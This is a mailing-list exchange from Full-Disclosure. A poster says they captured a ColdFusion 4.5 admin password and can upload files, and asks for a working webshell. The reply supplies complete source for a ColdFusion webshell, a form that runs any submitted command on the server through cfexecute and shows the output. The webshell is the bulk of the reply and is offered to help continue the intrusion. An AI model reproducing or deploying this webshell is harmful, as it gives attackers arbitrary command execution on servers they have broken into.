Re: [Full-disclosure] coldfusion pentest

[Frederic Charpentier <fcharpen@xxxxxxxxxxxxxxxx>]

Hi fatb,

from securiteam web site :
< html>
< body>

< cfoutput>
< table>
< form method="POST" action="cfexec.cfm">
 < tr>
  < td>Command:</td>
  < td> < input type=text name="cmd" size=50< cfif isdefined("form.cmd")>
value="#form.cmd#" </cfif>> < br></td>
 </tr>
 < tr>
  < td>Options:</td>
  < td> < input type=text name="opts" size=50 < cfif
isdefined("form.opts")> value="#form.opts#" </cfif> >< br> </td>
 </tr>
 < tr>
  < td>Timeout:</td>
  < td>< input type=text name="timeout" size=4 < cfif
isdefined("form.timeout")> value="#form.timeout#" < cfelse> value="5"
</cfif> > </td>
 </tr>
</table>
< input type=submit value="Exec" >
</FORM>

< cfsavecontent variable="myVar">
< cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout =
"#Form.timeout#">
</cfexecute>
</cfsavecontent>
< pre>
#myVar#
</pre>
</cfoutput>
</body>
</html>


I hope this helps. Fred


fatb wrote:
> Hi all guys
> 
> I've successed get the admin's passwd of the web interface
> 
> and I can upload any kinds of files to the server
> 
> the server is running coldfusion 4.5 with iis 5.0 
> 
> but I can not find a coldfusion webshell to continue
> 
> anybody could be kind enough to send me a  working coldfusion webshell
> 
> thx in advanced!
> 
> 
> ------------------------------------------------------------------------
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

-- 
Frederic Charpentier - Xmco Partners
Security Consulting / Pentest
web  : http://www.xmcopartners.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/